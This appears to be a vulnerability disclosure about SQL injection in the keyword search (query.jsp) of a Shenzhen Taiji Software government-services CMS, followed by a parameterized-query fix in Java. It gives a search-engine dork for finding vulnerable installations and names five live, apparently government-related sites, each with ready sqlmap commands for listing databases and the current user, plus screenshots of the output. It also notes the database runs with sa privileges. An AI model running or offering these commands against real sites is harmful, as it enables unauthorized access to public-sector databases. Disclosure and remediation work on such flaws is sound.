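### Brief description:
As the title says.
### Detailed description:
Affected vendor: 深圳太极软件有限公司 (Shenzhen Taiji Software Co., Ltd.)
Affected CMS: jsp+sqlserver
Every injection runs with sa privileges
Google keyword: inurl:application/zwdt
The problem is in the global search
application/zwdt/query.jsp post:keyword=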
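
For the fix side, a sketch of a keyword search that binds the POST parameter instead of concatenating it into the SQL text. This is an added example, not the vendor's code: the class name, the table `zwdt_items` and the column `title` are hypothetical, since the page shows neither the application's source nor its schema.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class KeywordSearch {
    // Hypothetical table/column names (assumption; the real schema is not on the page).
    // The keyword is bound as a parameter, so it never becomes part of the SQL text.
    private static final String SQL =
        "SELECT TOP 50 title FROM zwdt_items WHERE title LIKE ? ESCAPE '\\'";

    /** Escape SQL Server LIKE metacharacters (% _ [ and the escape char) so the keyword matches literally. */
    static String escapeLike(String keyword) {
        StringBuilder sb = new StringBuilder(keyword.length() + 8);
        for (char c : keyword.toCharArray()) {
            if (c == '\\' || c == '%' || c == '_' || c == '[') {
                sb.append('\\');
            }
            sb.append(c);
        }
        return sb.toString();
    }

    /** Run the search with a bound parameter; conn should use a read-only login, not sa. */
    static List<String> search(Connection conn, String keyword) throws SQLException {
        if (keyword == null || keyword.isEmpty() || keyword.length() > 100) {
            throw new IllegalArgumentException("keyword missing or too long");
        }
        List<String> titles = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setString(1, "%" + escapeLike(keyword) + "%");
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    titles.add(rs.getString(1));
                }
            }
        }
        return titles;
    }

    public static void main(String[] args) {
        // Constructed sample keyword: quotes need no escaping because the value is bound.
        System.out.println(escapeLike("50%_[draft]'x"));
    }
}
```

Because the report notes that every instance ran as sa, the connection passed to `search` should belong to a dedicated login with read access to the search tables only, which limits what any remaining injection can reach.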
Five examples selected:
1.http://www.lzxzsp.gov.cn
sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
![21.jpg](https://images.seebug.org/upload/201409/251813432721569eb63dd1e2dc6f27feb4fee067.jpg)
sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
![22.jpg](https://images.seebug.org/upload/201409/25181411b61d0ce9ec880bf80580755fc4248bd7.jpg)
2.http://www.cqwsxzfw.com/
sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
![23.jpg](https://images.seebug.org/upload/201409/25181921d6996ffd8a21f52f59c6e2694039feb1.jpg)
sqlmap -u "http://www.cqwsxzfw.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
![24.jpg](https://images.seebug.org/upload/201409/251818415cafdf12b03b4dc77ee47add3ca34a5e.jpg)
### Proof of vulnerability:
3.http://www.ddkspdt.com
sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs
![25.jpg](https://images.seebug.org/upload/201409/2518282648d0551b5608e520984ef72849739daa.jpg)
sqlmap -u "http://www.ddkspdt.com/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user
![26.jpg](https://images.seebug.org/upload/201409/251821355023c9caeea7832491bcb5d31aec3424.jpg)
4.http://www.xsspfwdt.cn
sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --dbs
![27.jpg](https://images.seebug.org/upload/201409/25182331b459048c7ca8a038a4e58dc432a03562.jpg)
sqlmap -u "http://www.xsspfwdt.cn/application/zwdt/query.jsp" --data "keyword=1&x=36&y=9" --current-user
![28.jpg](https://images.seebug.org/upload/201409/251823401bb5d5114453966d4993df3d35495637.jpg)
5.http://www.cqspbxz.com/
sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs
![123123213.jpg](https://images.seebug.org/upload/201409/25184456ee13a817af8e8373bc7dfa2d4b370853.jpg)
sqlmap -u "http://www.cqspbxz.com/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --current-user
![QQ图片20140925184305.jpg](https://images.seebug.org/upload/201409/25184336838d2df98e1b8c8b6da71b86849ae23d.jpg)